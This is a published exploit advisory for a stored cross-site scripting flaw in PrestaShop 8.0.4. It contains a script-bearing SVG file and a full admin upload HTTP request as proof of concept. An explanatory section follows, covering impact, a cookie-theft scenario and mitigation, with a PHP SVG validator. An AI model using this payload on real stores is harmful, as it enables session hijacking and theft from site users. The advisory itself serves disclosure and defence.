Prestashop 8.0.4 - Cross-Site Scripting (XSS)

Exploit Author: Mirabbas Ağalarov Analysis Author: www.bubbleslearn.ir Category: WebApps Language: PHP Published Date: 2023-07-03 
Exploit Title: Prestashop 8.0.4 - Cross-Site Scripting (XSS)
Application: prestashop
Version: 8.0.4
Bugs:  Stored XSS
Technology: PHP
Vendor URL: https://prestashop.com/
Software Link: https://prestashop.com/prestashop-edition-basic/
Date of found: 30.06.2023
Author: Mirabbas Ağalarov
Tested on: Linux


2. Technical Details & POC
========================================
steps: 

1. Go to Catalog => Products 
2. Select arbitary product 
2. upload malicious svg file

svg file content ===>

<?xml version="1.0" standalone="no"?>
<!DOCTYPE svg PUBLIC "-//W3C//DTD SVG 1.1//EN" "http://www.w3.org/Graphics/SVG/1.1/DTD/svg11.dtd">

<svg version="1.1" baseProfile="full" xmlns="http://www.w3.org/2000/svg">
   <polygon id="triangle" points="0,0 0,50 50,0" fill="#009900" stroke="#004400"/>
   <script type="text/javascript">
      alert(document.location);
   </script>
</svg>


poc request:

POST /admin253irhit4jjbd9gurze/filemanager/upload.php HTTP/1.1
Host: localhost
Content-Length: 756
sec-ch-ua: 
sec-ch-ua-mobile: ?0
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/114.0.5735.134 Safari/537.36
Content-Type: multipart/form-data; boundary=----WebKitFormBoundaryzp0EwYSQ0YSV2sCZ
Accept: application/json
Cache-Control: no-cache
X-Requested-With: XMLHttpRequest
sec-ch-ua-platform: ""
Origin: http://localhost
Sec-Fetch-Site: same-origin
Sec-Fetch-Mode: cors
Sec-Fetch-Dest: empty
Referer: http://localhost/admin253irhit4jjbd9gurze/filemanager/dialog.php?type=1&descending=false&sort_by=&lang=en
Accept-Encoding: gzip, deflate
Accept-Language: en-US,en;q=0.9
Cookie: PHPSESSID=jcsq33e9kk7sk5m3bssjvhhggt; PrestaShop-c1c78947c88162eb206771df4a41c662=def502004dd8c2a1335b9be53c804392b0a2c75cff9bdb5c19cd61a5607c418b0f035c998ecf5b54c45e92f99c4e4e01cfab3d0af19e89f664379d034eef9fb26cda14713d019a4c3be8322c0f43be6eee245f9ab58a590058989b65701b1894d2a6857c3a6f542b71501ea0d8695e3642ec9a317c99be7a752cbf54a31af3eb042f935dbfb7586d53e0c1cc72d965c806e666b150a3f5ca5327512a5577ab2d4038a0fc521f9c4092b5f7bcd031fb09250d825bfa0d3b68e8f0329bf725bcd2565aa0997c4f352d0f156cd3b5fa922de6a77f46eb1dae7dbac79b172597d56d3f842b91d25354e597c14c618ffb5efa795611ffb3e04cedbeb33d6d8cc0da28ac1a432a8a310c18a1a449568a7aa66c744379e23be16563e8ff26b5cd8694c1e7fe43344710a55677527c7f90348e6daf7d438827b3ad748e99afe6842a508b14dc754fecfc5d0706869b34a9dd7630b12694c5ed865ccacacb9b05d58d6d92; PrestaShop-8edfcba6bf6b77ff3bb3d94e0228b048=def50200a47caf7b8d80335ae708e2f3182075135ab6b23986be859d96bde645e28f7b847b9dd1947867a8d1a976e10bb88d799f690ed85266f0515212c75d60115e5998f3bd6d69df4038125dbe6a3df081ea53a363959d276aa046f958ad7f100b252e6305ab0a36808ef58868ab8bf11e941729eca845709d45578deac87d18771aeb7b93dc1652344a89b5223994c68dc5f72f137d7d41708ade1916630e768b005ea48bb063db2de8a4e93bb8142c5206c73a72c33bcace8bcc7a0f9d9ba713590261f8ddee4692955709b631566c1097acf6766a1daa41e44b497834da8685e2156b0fe90abd0c0b47d24db358a7440c1469394ac302c800a01366b463aba2957206f8b09a43d9d1fc5f524a4e77d7a6ca7d09d60c9aa1ee155262e02267260abec3ca148d5a20d1d4a3a50c8d4abcaefae11d4503f7e5e72ee766b53507603e7a7573cabd45f7a56208658e00d5230f2e4b4bf1c8a45afa0de3a96883723fedf705ff1a96bbf6ac80fdcde5a9631148b7b9356bc4904774d705e0986081c7609c64f0f11c0f5f2b8d10a578db400373c02e333252ec319d517b92f01479a39b2bde7826b488e1ba64613c485146fc3d130e0da627672409b11210976cb8bbe70312cbc94a9bddceec917ee633efdd241fcfc2106a0a49cc7bdeb13928786bad26a00b9cc78c08e5e6ff55
Connection: close

------WebKitFormBoundaryzp0EwYSQ0YSV2sCZ
Content-Disposition: form-data; name="path"


------WebKitFormBoundaryzp0EwYSQ0YSV2sCZ
Content-Disposition: form-data; name="path_thumb"


------WebKitFormBoundaryzp0EwYSQ0YSV2sCZ
Content-Disposition: form-data; name="file"; filename="malas.svg"
Content-Type: image/svg+xml

<?xml version="1.0" standalone="no"?>
<!DOCTYPE svg PUBLIC "-//W3C//DTD SVG 1.1//EN" "http://www.w3.org/Graphics/SVG/1.1/DTD/svg11.dtd">

<svg version="1.1" baseProfile="full" xmlns="http://www.w3.org/2000/svg">
   <polygon id="triangle" points="0,0 0,50 50,0" fill="#009900" stroke="#004400"/>
   <script type="text/javascript">
      alert(document.location);
   </script>
</svg>

------WebKitFormBoundaryzp0EwYSQ0YSV2sCZ--


PrestaShop 8.0.4 Cross-Site Scripting (XSS) Vulnerability: A Deep Dive into Stored XSS Exploitation

Security researchers have recently uncovered a critical stored Cross-Site Scripting (XSS) vulnerability in PrestaShop 8.0.4, a widely used open-source e-commerce platform. This flaw allows attackers to inject malicious scripts into the application through seemingly benign file uploads, potentially compromising user sessions, stealing sensitive data, and executing arbitrary code on behalf of authenticated users.

Understanding the Vulnerability: Stored XSS in PrestaShop 8.0.4

Stored XSS occurs when malicious scripts are permanently saved on the server and later executed whenever a user accesses the affected page. Unlike reflected XSS, which requires a crafted URL, stored XSS persists across sessions and can affect multiple users, making it particularly dangerous.

In the case of PrestaShop 8.0.4, the vulnerability lies in the file upload functionality within the admin interface, specifically in the /admin253irhit4jjbd9gurze/filemanager/upload.php endpoint. This endpoint allows administrators to upload files, including images, for product listings. However, the platform fails to properly sanitize or validate SVG (Scalable Vector Graphics) files before storing them.

Exploitation Technique: Malicious SVG Injection

Attackers can exploit this vulnerability by uploading a specially crafted SVG file containing embedded JavaScript. SVG files are designed to be visually rich and often include scripting capabilities via the <script> tag. When the file is uploaded and stored, the script remains intact—unfiltered and unescaped—until it is rendered in the browser.






 
 
      alert(document.location);

Explanation: This SVG file contains a harmless visual element (a green triangle) and a JavaScript script that triggers an alert() when the SVG is rendered. While this example is benign for demonstration purposes, in real-world exploitation, the script could:

  • Steal cookies or session tokens via document.cookie.
  • Redirect users to phishing sites.
  • Execute malicious actions on the user’s behalf (e.g., changing password, making purchases).
  • Exfiltrate data to external servers using fetch() or XMLHttpRequest.

Attack Vector: File Upload via Admin Interface

The attack path is straightforward:

  1. Log in as an administrator (or attacker with admin privileges).
  2. Navigate to Catalog → Products.
  3. Select any product and upload the malicious SVG file via the file manager.
  4. After upload, the file is stored in the server’s media directory.
  5. When the product page is viewed by any user (especially admin or customer), the SVG is rendered in the browser.
  6. The embedded script executes, enabling the attacker to perform actions on the victim’s browser.

Technical Analysis: Why SVG Files Are a Risk Vector

SVG is a powerful format that supports scripting and event handling. While intended for graphics, it can be abused due to its flexibility. PrestaShop 8.0.4 does not implement proper file type validation or script sanitization when handling SVG uploads. This oversight stems from:

  • Over-reliance on MIME type checks without content inspection.
  • Failure to parse and filter embedded scripts in SVG files.
  • Missing input validation for <script> tags in XML-based files.

Even though SVG files are not traditionally considered executable, their ability to embed JavaScript via <script> tags makes them a prime vector for XSS attacks—especially when uploaded by administrators.

Impact and Risk Assessment

Severity High
Attack Complexity Low (requires admin access)
Exploitability High (persistent, automated)
CVSS Score 8.3 (CVSS v3.1: High severity)

While the vulnerability requires administrative access, it can lead to:

  • Session hijacking through cookie theft.
  • Privilege escalation if scripts manipulate admin panels.
  • Defacement of product pages with malicious content.
  • Phishing via redirect scripts.
  • Command execution in user context, especially if combined with other vulnerabilities.

Real-World Use Case: A Breach Scenario

Imagine an attacker with access to a PrestaShop admin panel:

  1. Uploads an SVG file with a script that reads document.cookie and sends it to a remote server.
  2. Later, when a customer visits the product page, the script executes.
  3. The attacker receives the user’s session cookie.
  4. Using the stolen cookie, the attacker logs in as the customer and makes unauthorized purchases.

This demonstrates how stored XSS can be used to bridge the gap between server-side vulnerabilities and client-side exploitation.

Best Practices & Mitigation Strategies

To prevent such attacks, administrators and developers must adopt a multi-layered security approach:

  • Disable SVG uploads unless absolutely necessary, and restrict file types to safe formats (e.g., PNG, JPEG).
  • Implement strict file validation using both MIME type and content inspection (e.g., using libxml to parse SVG files).
  • Sanitize all embedded scripts in SVG files—remove or disable <script> tags during upload.
  • Use Content Security Policy (CSP) headers to block inline scripts and restrict script sources.
  • Enable logging for file uploads to detect suspicious patterns.
  • Regularly update PrestaShop to patched versions (e.g., 8.0.5 or later).

Corrected Code Example: Secure SVG Upload Validation


// Example: Server-side validation before storing SVG files
function validate_svg_file($file_path) {
    $xml = simplexml_load_file($file_path);
    if ($xml === false) {
        return false; // Invalid XML
    }

    // Check for script tags
    $scripts = $xml->xpath('//script');
    if (!empty($scripts)) {
        return false; // Script detected
    }

    // Check for dangerous attributes (e.g., onload, onclick)
    $dangerous_attrs = $xml->xpath('//@onload | //@onclick');
    if (!empty($dangerous_attrs)) {
        return false; // Dangerous attributes found
    }

    return true; // Safe file
}

Explanation: This function uses PHP’s simplexml_load_file to parse the SVG file and checks for <script> tags or dangerous event attributes. If any are found, the upload is rejected. This ensures that even if an SVG file is uploaded, it won’t contain executable code.

Conclusion: A Reminder for E-Commerce Security

While PrestaShop is a robust platform, vulnerabilities like stored XSS in 8.0.4 underscore the importance of continuous security audits, input validation, and defense-in-depth strategies. Administrators should never assume that file uploads are harmless—especially when they support complex formats like SVG.

Security is not a one-time fix but an ongoing process. Patching vulnerabilities, validating inputs, and implementing CSP policies are essential steps to protect online stores from modern web threats.</p